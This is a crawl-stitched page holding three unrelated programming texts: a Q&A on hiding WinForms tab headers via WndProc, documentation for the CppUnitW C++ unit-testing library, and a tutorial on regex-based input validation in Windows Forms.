I'm trying to hide tab headers in the tabControl, like it's shown here in this link, but I am getting an error in the designer's code. Once I change both lines, I get this: Severity Code Description Project File Line Message The designer cannot process unknown name 'SelectedIndex' at line 43. The code within the method 'InitializeComponent' is generated by the designer and should not be manually modified. Please remove any changes and try opening the designer again. c:\users\krzysztof\documents\visual studio 2015\Projects\DaneUzytkownika3\DaneUzytkownika3\TabController.Designer.cs 44 Severity Code Description Project File Line Error CS1061 'TabController' does not contain a definition for 'SelectedIndex' and no extension method 'SelectedIndex' accepting a first argument of type 'TabController' could be found (are you missing a using directive or an assembly reference?) DaneUzytkownika3 c:\users\krzysztof\documents\visual studio 2015\Projects\DaneUzytkownika3\DaneUzytkownika3\TabController.Designer.cs 43 Line 43 in the designer's code of the form is: this.tabControl1.SelectedIndex = 0; Could someone please tell me, how do I fix it? namespace hiding { class TablessTabControl : Form1 { protected override void WndProc(ref Message m) { // Hide tabs by trapping the TCM_ADJUSTRECT message if (m.Msg == 0x1328 && !DesignMode) m.Result = (IntPtr)1; else base.WndProc(ref m); } } } Form1.Designer.cs namespace hiding { partial class Form1 { /// <summary> /// Required designer variable. /// </summary> private I have created a project and implemented the tab control as given in your example as follows: class TablessTabControl : TabControl { protected override void WndProc(ref Message m) { // Hide tabs by trapping the TCM_ADJUSTRECT message if (m.Msg == 0x1328 && !DesignMode) m.Result = (IntPtr)1; else base.WndProc(ref m); } } Then upon rebuilding the project I add my new TablessTabControl to a test form using the designer. Within the designer, I can switch between the tabs using the visible headers. At runtime, the headers disappear as intended. I have two tabs; I am able to select between the tabs by using the following code: // Selects the first tab: tablessTabControl1.SelectedIndex = 0; // Selects the second tab: tablessTabControl1.SelectedIndex = 1; Additionally, in Form1.Designer.cs, I have line 48 as follows: this.tablessTabControl1.SelectedIndex = 0; which poses no difficulty for me. Have you tried closing all documents, cleaning the solution, rebuilding and reopening the designer?
http://www.devsplanet.com/question/35278227
CC-MAIN-2016-50
en
refinedweb
The changes made to CppUnit are: CppUnitW 1.2: includes source and documentation for VC++ and Unix. (200Ko). CppUnitW 1.1: includes source and documentation. (233Ko). Download and unzip your version of CppUnitW.Download and unzip your version of CppUnitW. Compiling the samples The physical layout is as follow: CppUnit/: The directory contained in the zip file. doc/: Contains some documentation about unit testing. index.html This page (without images). examples/: Some examples. Example.dsw VC++ workspace for the hierarchy example. hierarchy/: Source of a text test runner based example. msvc6/: VC++ specific examples (use the graphic TestRunner) HostApp/: Source of a graphic test runner based example. HostApp.dsw Workspace to compile the graphic test runner based example. Lib/: Target directory for the compiled dll and libraries. src/: Source (cppunit should move there...) cppunit/: Source for the CppUnit library and private headers. CppUnit.dsw Workspace to compile the cppunit static library. msvc6/: Source specific to VC++ platform. TestRunner/: Source of the graphic test runner dynamic library. TestRunner.dsw Workspace to compile the graphic test runner.Now, to run your first sample: The top combo box show the most recently used test. You select a test using the button Browse (that's a new feature). When a test is run using the Run button, the color of the progress bar indicates if a test has failed (red) or not (green). The list below show details about the failed test. The autorun check box indicates is the most recently used test must be automatically run when the test runner is opened. All those settings are stored in the host application registry in the CppUnit section (allowing per application setting and more recently used test list). Pressing the spacebar will run the selected test. Pressing 'Q' will send a WM_QUIT message to the host application, which should result in exiting the host application. The above dialog appears when you click on Browse button. You select the test you want to run with this dialog. You can explore the hierarchy of tests. One of the major improvement of this version over other is the creation of test case.One of the major improvement of this version over other is the creation of test case. Creating test case For the first comer who had never used cppunit, I would recommend to first try using the macro, since it's easier to set up, then switch to the template helper such as TestSuiteBuilder once they get a feeling of how it works. Macros makes it easy, but you can't build upon the existing framework using them. First, you must create a class that inherit CppUnit::TestCase, the base class for all test case:First, you must create a class that inherit CppUnit::TestCase, the base class for all test case: The way of macros Then, you declares the test suite for this test case, and all the methods to run for this test case:Then, you declares the test suite for this test case, and all the methods to run for this test case:#include <cppunit/TestCase.h> #include <cppunit/extensions/HelperMacros.h>class ExampleTestCase : public CppUnit::TestCase { The macro CU_TEST_SUITE actually declares a bunch of typedef, implements the static method suite() which returns the suite for this test case, and start implementing a template method named registerTests.The macro CU_TEST_SUITE actually declares a bunch of typedef, implements the static method suite() which returns the suite for this test case, and start implementing a template method named registerTests.CU_TEST_SUITE( ExampleTestCase ); CU_TEST( example ); CU_TEST( anotherExample ); CU_TEST( testAdd ); CU_TEST( testDivideByZero ); CU_TEST( testEquals ); CU_TEST_SUITE_END(); public: ... What do we have at that point: #include "ExampleTestCase.h" CU_TEST_SUITE_REGISTRATION( ExampleTestCase ); The macro CU_TEST_SUITE_REGISTRATION defines a static variable of type CppUnit::AutoRegisterSuite, with the specified class type. When this variable will be initialized (at static initialization time), it will retrieve the suite() of the class and register it to the TestRegistry. The parameter is the type of the test case, for example, CU_TEST_SUITE_REGISTRATION( ChessTest<Chess> ) is used to register a template test case. This great thing about this is that it works just fine with template! No more TestCaller instantiation of the death. There is one thing that remaining: how to sub-class a test case ? The macros makes it very easy, instead of using CU_TEST_SUITE to declare the suite, you do as follow: As you can see, you must use the macro CU_TEST_SUB_SUITE and specify the base class as well as the test case class. That's all, it's all done!As you can see, you must use the macro CU_TEST_SUB_SUITE and specify the base class as well as the test case class. That's all, it's all done!class SimpleSubTest : public SimpleTest { CU_TEST_SUB_SUITE( SimpleSubTest, SimpleTest ); CU_TEST( testAdd ); CU_TEST( testSub ); CU_TEST_SUITE_END(); public: ... Since your reading this, your are familiar with CppUnit architecture. One of the thing I found frustrating was the building of suite. Here you have your traditional template test case:Since your reading this, your are familiar with CppUnit architecture. One of the thing I found frustrating was the building of suite. Here you have your traditional template test case: The way of templates #include <cppunit/TestCase.h>Here we created a test case for a string class. The test case itself is a template parametrized with the type of character used by the string. #include <cppunit/TestSuite.h> template<typename CharType> class StringTest : public TestCase { public: static CppUnit::TestSuite *suite(); void testAppend(); void testLength(); }; The static method suite() returns a suite containing the test to run for this test case. Here is the typical way this method is implemented: template<typename CharType>I found that very hard to read and maintain, so I created a helper template class to make it easier. This is the TestSuiteBuilder. Here is how to use it: CppUnit::TestSuite * StringTest<CharType>::suite() { // Constructs the suite naming it after the test case class name... CppUnit::TestSuite *suite = new CppUnit::TestSuite( StringTest<CharType> ); // adds test caller to the suite for each of the test method. suite->addTest( new CppUnit::TestCaller< StringTest<CharType> >( "testAppend", &StringTest<CharType>::testAppend ) ); suite->addTest( new CppUnit::TestCaller< StringTest<CharType> >( "testLength", &StringTest<CharType>::testLength ) ); } #include <cppunit/extensions/TestSuiteBuilder.h>As you can see it much readable... [...] template<typename CharType> CppUnit::TestSuite * StringTest<CharType>::suite() { CppUnit::TestSuiteBuilder< StringTest<CharType> > suite; suite.addTestCaller( "testAppend", testAppend ); suite.addTestCaller( "testLength", testLength ); return suite.takeSuite(); } You still have to pass the suite to the test runner. There is two ways to do that: You can use the TestFactoryRegistry: #include <cppunit/extensions/AutoRegisterSuite.h>This will create a TestSuiteFactory for the specified class and register it to the TestFactoryRegistry. static CppUnit::AutoRegisterSuite< StringTest<CharType> > suite__;(). Using TestRunner from your application Here is what you need to do if you are using the TestFactoryRegistry (the CU_TEST_SUITE_REGISTRATION macro or the template AutoRegisterSuite): #include <TestRunner/TestRunner.h> #include <cppunit/extensions/TestFactoryRegistry.h> [...] CHostAppDoc::OnNewDocument() { TestRunner runner; runner.addTest ( CppUnit::TestFactoryRegistry::getRegistry().makeTest() ); // open and run the test runner dialog... runner.run(); [...] }And if you want to do it the traditional way: #include <TestRunner/TestRunner.h> #include "StringTest.h" #include "ExampleTestCase.h" [...] CHostAppDoc::OnNewDocument() { TestRunner runner; runner.addTest( StringTest<char>::suite() ); runner.addTest( StringTest<wchar_t>::suite() ); runner.addTest( ExampleTestCase::suite() ); runner.run(); [...] } For the includes, there is two ways:For the includes, there is two ways: Compiling with CppUnit and TestRunner Warning: when running your application, the TestRunnerd.dll which is in the Lib directory need to be the path (see ::LoadLibrary documentation for loading order). I usually ensure that the DLL is in the debug directory by adding a post build "copy" command. See Project Settings/Post-build Step from the HostApp example for detail.
http://gaiacrtn.free.fr/cppunit/index.html
CC-MAIN-2016-50
en
refinedweb
Manipulating Action Method Parameters During the MVP summit, an attendee asked me for some help with a common scenario common among those building content management systems. He wanted his site to use human friendly URLs. instead of Notice how the first URL is descriptive whereas the second is not. The first URL contains a URL “slug” while the second one contains the ID for the content, typically associated with the ID in the database. This is easy enough to set up with routing, but there’s a slight twist. He still wanted the action method which would respond to the first URL to have the integer integer ID as the parameter, not the slug. Let’s look at one possible approach to solving this. Here’s an example of what the route might look like: routes.MapRoute( "Slug", // Route name "pages/{slug}", // URL with parameters new { controller = "Home", action = "Content" } // Parameter defaults ); Notice that the route URL contains one parameter for “slug” and no “id” parameter whatsoever. Here’s an example of the controller action that route should map to. public ActionResult Content(int id) { // Note the argument is an id, not slug return View(); } Note that the action method does not accept a parameter named “slug” but instead expects an integer “id” parameter. Fortunately, there’s an easy way to do this. Action filters, classes which derive from ActionFilterAttribute, allow hooking into the point in time after the parameters of action method have been bound, but just before the action method has been invoked. This gives us a fine opportunity to muck around with the parameters. The following is an example of an action filter which converts a slug to an ID (you can imagine a real one would probably look it up in the database, not in a static dictionary like the sample does). public class SlugToIdAttribute : ActionFilterAttribute { static IDictionary<string, int> Slugs = new Dictionary<string, int> { {"this-is-a-slug", 100}, {"another-slug", 101}, {"and-another", 102} };); } } The filter overrides the OnActionExecuting method which is called just before the action method is called. The filter than grabs the slug from the route data, and looks up the corresponding id. Now all we need to do is make sure the id is passed into the action method. Fortunately the filter context passed into this method allows us to peek into the parameters that will get passed into the action method via the ActionParameters property. Not only that, it allows us to change them! In this case, I’m grabbing the slug from the route data, and looking up the associated id, and adding a parameter named “id” to the action parameters with the correct id value. All I need to do now is apply this filter to the action method and when the action method is called, this id will be passed into the method. This works whether the argument to the action method is a simple primitive type as in this example or whether it’s a complex type. I’ve included a sample project that demonstrates changing parameters to action methods via an action filter.
http://haacked.com/archive/2010/02/21/manipulating-action-method-parameters.aspx/
CC-MAIN-2016-50
en
refinedweb
Answering questions Stack Overflow, I use the same ipython notebook, which makes its easier to search previously given answers. The notebook is starting to slow down. The question I have is: How do I count the numbers of cells in the notebook? For example: import json document = json.load(open(filepath,'r')) for worksheet in document['worksheets']: print len(worksheet['cells'])
https://codedump.io/share/UigARoEYoJqc/1/ipython-notebook-count-number-of-cells-in-notebook
CC-MAIN-2016-50
en
refinedweb
From: Steven Watanabe (watanabesj_at_[hidden]) Date: 2008-06-06 18:00:53 AMDG Frank Birbacher wrote: > By the way: looking into the introduction of xpressive, who actually > allowed identifiers like "_w"? Leading underscore and a non-digit > following it would be reserved to the compiler, I thought?!? > Only in the global namespace for lower case letters.
https://lists.boost.org/boost-users/2008/06/37022.php
CC-MAIN-2020-16
en
refinedweb
Hello build a url shortener app using hooks and exploring all logic behind it. Our final result Let’s get started We can get started by making a new React Native project, either by using Expo or React Native Cli. Whatever the way you go, you will get something', }, }); As I have mentioned before, hook will let you use state within a functional component, and useState() is the api Behind it. First we will need to import it from react. import React, {useState} from 'react'; Then we can use it within our component like this. const [url, setUrl] = useState("") Whet this means is, define a new state with a variable url and an initial value of en empty string “”, plus a function to update this variable setUrl. Which is similar to making a new function that updates the particular variable url using this.setState(). You can declare as much variables as you want with any type. Another example would be const [todos, setTodos] = useState([{ text: 'Get Milk', done: false }]); Let’s add a new one for the final url const [finalUrl, setFinalUrl] = useState("") Building Url Shorten App UI Now that we know how to use hooks, we can start by building the app UI and interact with it using hooks. The UI will consist of 4 elements, an App logo/ title, a TextInput for the url the user wants to shorten. Shortening Button and finally the short url result. Our Render method will look like this. <View style={styles.container}> <Text style={styles.title}>my <Text style={{color:"#ff7c7c"}}>URL</Text> </Text> <TextInput style={styles.urlInput} onChangeText={text => setUrl(text)} value={url} <TouchableOpacity style={styles.ShortenBtn} onPress={()=>shorten()}> <Text style={{color:"#fff"}}>Shorten</Text> </TouchableOpacity> <Text style={styles.finalUrl}>{finalUrl}</Text> </View> Notice, The TextInput component, is update the state url by using setUrl that we defined using useState, and also getting the value from the url. Styles const styles = StyleSheet.create({ container: { flex: 1, backgroundColor: '#fff', alignItems: 'center', justifyContent: 'center', }, title:{ color:"#21243d", fontWeight:"bold", fontSize:50, marginBottom:50 }, urlInput:{ height: 50, width:"80%", borderColor: '#21243d', borderWidth: 1, borderRadius:5, padding:10, backgroundColor:"#FAFAFA", marginBottom:20, fontSize:20 }, ShortenBtn:{ backgroundColor:"#ff7c7c", borderRadius:20, height:40, width:"80%", justifyContent:"center", alignItems:"center" }, finalUrl:{ height: 40, width:"80%", marginTop:20, fontSize:20, textAlign:"center", } }); Url Shortening For url shortening, I will be using a free api by cut.ly, to simulate an api call by our app, which we will be needing for our next hook useEffect. It’s a pretty straight forward GET call, so I will be using fetch. const shorten = async ()=>{ fetch("[API-KEY]&short="+url) .then(async response => { const data = await response.json() setFinalUrl(data.url.shortLink) }) .catch(err => { console.log(err); }); } As you can use, the url will have 2 parameters, key for the api key by cut.ly, you can get it by simply making a new free account. And short which is a string for the url we want to shorten. Notice that we are getting that url from the useState hook we made earlier. And once we have the result we use setFinalUrl to update the state with final url from the api. Once you click the shorten button, everything should be good and you will get a shortened url, Like this. As I have mentioned, hooks let you use both state and lifecycle methods within a functional component.And this is exactly what useEffect() does. To put it simply, useEffect() is basically componentDidMount, componentDidUpdate, and componentWillUnmount all combined. In other way, useEffect() is a function that runs whenever something affects your component, either state or prop update etc. You can use it like this. useEffect(() => { console.log("Component updated") }); But using it this way, will simulate an uncontrolled componentDidUpdate, which will run dozens of time, which we do not want mostly. So we can add a second argument to useEffect() with the field we want it to run when changes, instead of acting like componentDidUpdate. To achieve this, you can just add an empty array as a second argument. useEffect(() => { console.log("Component updated") },[]); And if you want it to run only when a state field changes, you can add it to the empty array. useEffect(() => { console.log("Component updated") },[url]); And this is exactly what we want to achieve, in our app. instead of shortening the url when a user presses the button. We can use useEffect() to shorten the url when the url field changes, as when the user finishes writing the url he wants to shorten. So our useEffect() now will look, like this. useEffect(()=>{ shorten() },[url]) That was it for this. great! Great content! Super high-quality! Keep it up! 🙂
https://reactnativemaster.com/react-native-hooks-example/
CC-MAIN-2020-16
en
refinedweb
Red Hat Bugzilla – Bug 1247188 [abrt] ddccontrol-gtk: fill_profile_manager(): gddccontrol killed by SIGSEGV Last modified: 2016-12-20 09:19:35 EST Version-Release number of selected component: ddccontrol-gtk-0.4.2-11.20120904gitc3af663d.fc22 Additional info: reporter: libreport-2.6.1 backtrace_rating: 4 cmdline: gddccontrol crash_function: fill_profile_manager executable: /usr/bin/gddccontrol kernel: 4.1.2-200.fc22.x86_64 runlevel: N 5 type: CCpp Truncated backtrace: Thread no. 1 (5 frames) #0 fill_profile_manager at gprofile.c:168 #1 refresh_profile_manager at gprofile.c:269 #2 delete_callback at gprofile.c:122 #3 _g_closure_invoke_va at gclosure.c:831 #6 gtk_real_button_released at gtkbutton.c:1712 Created attachment 1056584 [details] File: backtrace Created attachment 1056585 [details] File: core_backtrace Created attachment 1056586 [details] File: dso_list Created attachment 1056587 [details] File: limits Created attachment 1056588 [details] File: maps Created attachment 1056589 [details] File: namespaces Created attachment 1056590 [details] File: open_fds Created attachment 1056591 [details] File: proc_pid_status *** Bug 12818.
https://bugzilla.redhat.com/show_bug.cgi?id=1247188
CC-MAIN-2017-43
en
refinedweb
Red Hat Bugzilla – Bug 1256098 [abrt] plasma-workspace: QMessageLogger::fatal(char const*, ...) const(): drkonqi killed by SIGABRT Last modified: 2016-12-20 09:27:45 EST Version-Release number of selected component: plasma-workspace-5.3.2-10.fc23 Additional info: reporter: libreport-2.6.2 backtrace_rating: 4 cmdline: /usr/libexec/drkonqi -platform xcb -display :0 --appname kdeinit5 --kdeinit --apppath /usr/bin --signal 11 --pid 11156 --startupid 0 --restarted crash_function: QMessageLogger::fatal(char const*, ...) const executable: /usr/libexec/drkonqi global_pid: 11529 kernel: 4.2.0-0.rc6.git0.2.fc23.x86_64 runlevel: N 5 type: CCpp uid: 1000 Truncated backtrace: Thread no. 1 (10 frames) #2 QMessageLogger::fatal(char const*, ...) const at global/qlogging.cpp:1575 #4 QXcbConnection::QXcbConnection(QXcbNativeInterface*, bool, unsigned int, char const*) at qxcbconnection.cpp:477 #5 QXcbIntegration::QXcbIntegration(QStringList const&, int&, char**) at qxcbintegration.cpp:177 #6 QXcbIntegrationPlugin::create(QString const&, QStringList const&, int&, char**) at qxcbmain.cpp:50 #7 QPlatformIntegrationFactory::create(QString const&, QStringList const&, int&, char**, QString const&) at kernel/qplatformintegrationfactory.cpp:56 #9 QGuiApplicationPrivate::createPlatformIntegration() at kernel/qguiapplication.cpp:1020 #11 QGuiApplicationPrivate::createEventDispatcher() at kernel/qguiapplication.cpp:1194 #12 QCoreApplication::init() at kernel/qcoreapplication.cpp:768 #13 QCoreApplication::QCoreApplication(QCoreApplicationPrivate&) at kernel/qcoreapplication.cpp:689 #14 QGuiApplication::QGuiApplication(QGuiApplicationPrivate&) at kernel/qguiapplication.cpp:570 Created attachment 1066149 [details] File: backtrace Created attachment 1066150 [details] File: cgroup Created attachment 1066151 [details] File: core_backtrace Created attachment 1066152 [details] File: dso_list Created attachment 1066153 [details] File: environ Created attachment 1066154 [details] File: limits Created attachment 1066155 [details] File: maps Created attachment 1066156 [details] File: mountinfo Created attachment 1066157 [details] File: namespaces Created attachment 1066158 [details] File: open_fds Created attachment 1066159 [details] File: proc_pid_status Created attachment 1066160 [details] File: var_log_messages Similar problem has been detected: Crashed while changing display settings reporter: libreport-2.6.4 backtrace_rating: 4 cmdline: /usr/libexec/drkonqi -platform xcb -display :0 --appname akonadi_davgroupware_resource --apppath /usr/bin --signal 11 --pid 2371 --startupid 0 crash_function: QMessageLogger::fatal(char const*, ...) const executable: /usr/libexec/drkonqi global_pid: 2674 kernel: 4.5.5-201.fc23.x86_64 package: plasma-workspace-drkonqi-5.6.4-1.fc23 reason: drkonqi killed by SIGABRT.
https://bugzilla.redhat.com/show_bug.cgi?id=1256098
CC-MAIN-2017-43
en
refinedweb
CodePlexProject Hosting for Open Source Software Hi I'm trying to deserialize a JSON object into a .NET object that has a property collection of interfaces. I want to use a Unity IOC container to create the actual object. public class MyClass { public List<ISomeType> Children { get; private set;} } The deserialization fails because the interface (ISomeType) can't be instantiated. Is it possible to provide a "type converter" that will provide an instance from the container instead of using the default type creation? Hope this makes sense, Thanks If you get the latest source and use it then check out a JsonConverter I just added called CustomCreationConverter. I haven't written any tests around it yet so no promises but inheriting from that should let you achieve what you are looking for. Thanks - it works perfectly :) I'm facing a similar problem with deserializing a List<T> where T is an abstract class. Now i'm trying to make it work using the CustomCreationConverter, but some questions arise: 1. How do i know which type the serialized object actually is? 2. Trying to implement the Converter, i instantly run into a ReferenceLoop excection. Without the converter it serializes just fine tho, that's quite confusing. I appreciate any help! The converter you create should only converter T. The serializer will handle serializing/deserializing the list. I'm sorry to bother you again, but I don't get it. I got a similar scenario where a List<IComponent> contains different objects all implementing the IComponent interface. I created the CustomCreationConverter<IComponent> but how should I decide in overridden method IComponent Created(Type objectType) which class to return? I assumed the following code works: public override IComponent Create(Type objectType) { if (objectType == typeof(AComponent)) return new AComponent(); if (objectType == typeof(BComponent)) return new BComponent(); if (objectType == typeof(CComponent)) return new CComponent(); throw new ApplicationException(String.Format("The given objectType {0} is not supported!", objectType)); } But it doesn't as objectType contains IComponent as type. How to solve this? Any help is appreciated! Many Thanks. It want be those types because all it knows is that it is deserializing to an IComponent. You can include the type name in JSON using Json.NET if you want to track the exact object type of some values. Hello, You have suggested adding the type name to the JSON object, how can we read the type name in order to deserialise to the correct object type? Our example: public abstract class CVehicle { public abstract string Type { get; set; } } public class CCar : CVehicle { [JsonProperty] public override string Type { get { return "Car"; } set { } } [JsonProperty] public string Engine { get; set; } } public class CBike : CVehicle { [JsonProperty] public override string Type { get { return "Bike"; } set { } } [JsonProperty] public string Pedal { get; set; } } We can serialise a car to: {"Type":"Car","Engine":"Honda"} We use the following code to serialise and deserialise a car: CCar oCar = new CCar() { Engine = "Honda" }; string sJsonData = JsonConvert.SerializeObject(oCar); CVehicle oVehicle = JsonConvert.DeserializeObject<CVehicle>(sJsonData); How can we deserialise the JSON representation of the car into the correct type using the Type property of the JSON. Any help would be appreciated I agree! Currently the CustomCreationConverter<>.Create() method isn't very useful if you need to instantiate a class based on the JSON contents. It would be much more useful if it could access the Json configuration for the object it's supposed to instantiate, i.e. I'd love for the signature to look something like this: public override T Create(Type type, IDictionary<string, object> jsonObjet); Then to custom create method could do: public override IComponent Create(Type objectType, IDictionary<string, object> args) { switch(args["Type"]) { case: "Car": return new CCar(); case: "Bike": return new CBike(); } throw new ApplicationException(String.Format("The given vehicle type {0} is not supported!", args["Type"])); } This is the approach the System.WebScript.Serialization.JavaScriptConverter.Deserialize() takes. I'm not sure how easily this would be done in JSON.NET, since it only parses the JSON object's content after instantiating the .Net object. SWS takes a bottom up approach where it first parses all the JSON before instantiating .Net objects.. cdlk wrote:. This only works if the data you are deserializing was serialized with JSON.Net, and it was serialized using the same Assembly/classes. This won't work if you're consuming 3rd party data or should decide to refactor your .Net classes and hope for them to still be able to deserialize legacy data. Yep that's true, and it is a problem which I have run into. I considered getting the third party app to generate JSON with the type attributes which Json.NET would expect, but this is quite a fragile solution for legacy data as you say.. cdlk wrote:. I wouldn't mind taking this approach, but I don't see how it could read the type attribute before calling the serialiser to populate the object. As far as I can tell, the serialized wants to do its own reading of the object. If you create a custom converter you have access to the JSON (through the JsonReader) for that 'node' in the object graph. You can get the JObject representation of the JSON using something like JObject.Load(reader). Your type property can then be read off the JObject without deserializing the whole thing into a .NET object, e.g. jObject["type"].Value<string>(). Once you've found out which object you need to new up, you can invoke the serializer (which you have access to in ReadJson) and have it Populate the object you just made. The only minor annoyance I have found here is that there is no way to reset the JsonReader, i.e. you can't have the serializer populate the new object from the same reader you used to Load the JObject above. The only way I could see to do this is with jObject.CreateReader() on the JObject created above, to make a new reader. I'm not sure how expensive this operation is, but I'd like to be able to reset and re-use the original JsonReader here. Brilliant, I didn't realize I could get the reader off the deserialized JObject to populate my target object. This is exactly the solution I was after. FYI, this is how I've ended up implementing this type of deserialization. The JsonCreationConverter<T> class does most of the work: abstract class JsonCreationConverter<T> : JsonConverter { /// <summary> /// Create an instance of objectType, based properties in the JSON object /// </summary> /// <param name="objectType">type of object expected</param> /// <param name="jObject">contents of JSON object that will be deserialized</param> /// <returns></returns> protected abstract T Create(Type objectType, JObject jObject); public override bool CanConvert(Type objectType) { return typeof(T).IsAssignableFrom(objectType); } public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer) { // Load JObject from stream JObject jObject = JObject.Load(reader); // Create target object based on JObject T target = Create(objectType, jObject); // Populate the object properties serializer.Populate(jObject.CreateReader(), target); return target; } public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer) { throw new NotImplementedException(); } } This class can be then derived to implement the actual construction of objects: class CVehicleConverter : JsonCreationConverter<CVehicle> { protected override CVehicle Create(Type objectType, JObject jObject) { var type = (string)jObject.Property("Type"); switch (type) { case "Car": return new CCar(); case "Bike": return new CBike(); } throw new ApplicationException(String.Format("The given vehicle type {0} is not supported!", type)); } } I'm really struggling with this... it seems like it should be so simple! I'm trying to parse an HTTP POST. if I try accepting a string, I get a runtime error at the client "System.String" is not supported for deserialization of an array. Using the following approach: [WebMethod(EnableSession = true)] public string EvaluationTest(String EvalData) { var EvalInfo = JsonConvert.DeserializeObject(EvalData); .... } the following approach throws a similar: "EvaluationCollection" is not supported for deserialization of an array. Using [WebMethod(EnableSession = true)] public string EvaluationTest(EvaluationCollection EvalData) { // var EvalInfo = JsonConvert.DeserializeObject(EvalData); ... } ... No, I can't figure out the DeserializationObject parameters from the JSON.NET documentation. this is the Json (snippet) I want to parse: { "EvalData": [ {"ss": 2,"UiD": 1 }, { "ss": 2,"UiD": 2 } ]} my classes: public abstract class EvaluationCollection {public OneEvaluation[] EvalData; } public class OneEvaluation { public int UiD; public int ss; } probably the best post I've seen, in three days of looking, was this: A little help is MUCH appreciated ! Hi! I am trying to override what type the ISO 8601 DateTime string is deserialized to. Mainly because I do not want to use .Net's implementation of DateTime on the inside of our application. I have created my own implementation of DateTime, created a custom JsonConverter, the WriteJson method works fine and produces ISO 8601 strings as expected (an example: 2012-12-16T20:20:57.0225219Z). But when I try to deserialize this with my custom json converter, it just explodes with "System.FormatException : Input string was not in a correct format." I never reach my overridden ReadJson method. So is there a way of reconfiguring the JsonConverter so that such date time strings may bypass the default implementation in Json and be forwarded to my custom converter? Thanks, Steinar Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
https://json.codeplex.com/discussions/56031
CC-MAIN-2017-43
en
refinedweb
Translate CSV To HTML January 15, 2013 A common format for data storage is the CSV format for comma-separated values. A common format for data presentation is HTML for browsers using tables. Your task is to write a function that reads a file in CSV format and translates it to a table in HTML format. When you are finished, you are welcome to read or run a suggested solution, or to post your own solution or discuss the exercise in the comments below. Advertisements […] today’s Programming Praxis exercise, our goal is to translate a csv file to an HTML table. Let’s get […] My Haskell solution (see for a version with comments): […] Question is from here: […] Java solution here. Answer in awk (here)[]. Sorry for the sloppy comment, I don’t know the markup required for the comments here. […] Pages: 1 2 […] Ruby solution Doesn’t seem anyone other than Programming Praxis dealt with quoted strings (which, granted, isn’t necessarily a part of ‘official’ CSV files). It does make the code quite a bit more interesting if you do. :) Anyways, here’s my short (ugly) version that doesn’t deal with quoted strings: And here’s a longer (more awesome!) version that correctly deals with quotes and translates what it can to Scheme values (numbers, symbols, #t/#f, etc): blog post […] post is a Python solution to a programming challenge from Programming Praxis. The challenge is to read a csv file and convert it into an html […] Here’s a solution in PHP: <?php define("DIRECTORY", "./"); if (file_exists(DIRECTORY."x.txt")) { $xfile = fopen(DIRECTORY."x.txt", "r"); $xcontent = fgetcsv($xfile); echo " “; foreach ($xcontent as $xentry) { echo “”.$xentry.””; } echo ” “; } else die(“The file does not exist.”); ?> Quotation marks delineated with a q: <?php define("DIRECTORY", "./"); if (file_exists(DIRECTORY."x.txt")) { $xfile = fopen(DIRECTORY."x.txt", "r"); $xcontent = fgetcsv($xfile); echo q q; foreach ($xcontent as $xentry) { echo qq.$xentry.qq; } echo q q; } else die(“The file does not exist.”); ?> Third time is NOT a charm… :/ CSV To HTML Using JSP CSV To HTML Python 3.3 solution. Uses the standard library csv to read the file and elementtree to build the table as an xml document. The tostring method takes care of properly escaping characters like <, if any, in the file. import csv import xml.etree.ElementTree as et def csv2html(filelike_obj, id_=None): table = et.Element(‘table’, {‘id’:id_} if id_ else {}) for n, line in enumerate(csv.reader(filelike_obj)): row = et.SubElement(table, ‘tr’) if n&1: row.set(‘class’, ‘odd’) for item in line: col = et.SubElement(row, ‘td’) col.text = item return et.tostring(table, method=’html’).decode() Not sure what happened to the formatting above. C#: C#: erdalkiran, few comments on your solution: 1. It generates 1-column table – for every comma in the source you produce a new row in the output. Instead it should produce a cell for every comma and a row for each newline. 2. I see no reason for manual buffered read in this case – you don’t process those chunks one by one, and in the end you still have a full raw string in memory, so why not use something like StreamReader.ReadToEnd() for simplicity? 3. I can’t see a practical reason for using StringBuilder to store the final output here. StringBuilder might save you memory allocations and some processor cycles if you have lots of string operations, true. But you only have 2 appends. Your code will still likely force a StringBuilder to allocate memory for its internal storage, perhaps more times than it would take to allocate 3 usual immutable strings in the first place. Thus, I would suggest to implement your approach something like this:
https://programmingpraxis.com/2013/01/15/translate-csv-to-html/?like=1&source=post_flair&_wpnonce=6952e6b5fb
CC-MAIN-2017-43
en
refinedweb
better add an alarm bell to wake up the user when all that was done! Thinking that there had to be a better way, I dug out my books on regular expressions and started wading through them again. An overwhelming sense of despair hit me faster than you can say regular expressions simple. By the time you are done, you will be able to write simple validators, and you will know enough about regular expressions to dig into it further without slitting your wrists. The project that accompanies this article contains a little application called Regex Tester. I have also included an MSI file to install the binary, for those who do not want to compile the application themselves. Regex Tester is so simple as to be trivial. In fact, it took longer to create the icon than it took to code the app! It has a single window: The Regex text box contains a regular expression (a ‘regex’). The one shown here matches a string with an unsigned integer value, with an empty field allowed. The Regex box is green because the regex is a valid regular expression. If it was invalid, the box would be red (okay, pink) like the Test box. And speaking of the Test box, it’s red because its contents don’t match the pattern in the Regex box. If we entered a digit (or digits) in the Test box, it would be green, like the Regex box. We’ll use Regex Tester shortly. But first, let’s give some thought to the mechanics of validating user input. There are three ways to validate user input: I recommend against relying on submission validation in a Windows Forms application. Errors should be trapped sooner, as close to when they are entered as possible. Nothing is more annoying to a user than a dialog box with a laundry list of errors, and a form with as many red marks as a badly-written school paper is not far behind. The rule on validation is the same as the rule on voting in my home town of Chicago: “Validate early, and validate often.” Windows provides a Validating event that can be used to provide completion validation for most controls. An event handler for the Validating event typically looks something like this: Validating private void textBox1_Validating(object sender, CancelEventArgs e) { Regex regex = new Regex("^[0-9]*$"); if (regex.IsMatch(textBox1.Text)) { errorProvider1.SetError(textBox1, String.Empty); } else { errorProvider1.SetError(textBox1, "Only numbers may be entered here"); } } The first line of the method creates a new regular expression, using the Regex class from the System.Text.RegularExpressions namespace. The regex pattern matches any integer value, with empty strings allowed. Regex System.Text.RegularExpressions The second line tests for a match. The rest of the method sets the error provider if the match failed, or clears it if the match succeeded. Note that to clear the provider, we set it with an empty string. To try out the code, create a new Windows Forms project, and place a text box and an error provider on Form1. Add a button to the form, just to give a second control to tab to. Form1 Create an event handler for the text box Validating event, and paste the above code in the event handler. Now, type an ‘a’ in the text box and tab out of it. An error ‘glyph’ should appear to the right of the text box, like this: If you move the mouse over the glyph, a tool tip should appear with the error message. Much more elegant, and far less jarring, than a message box! But we can actually do better than that. Add an event handler for the text box TextChanged event, and paste the code from the Validating event into it. Now, run the program, and type an The TextChanged 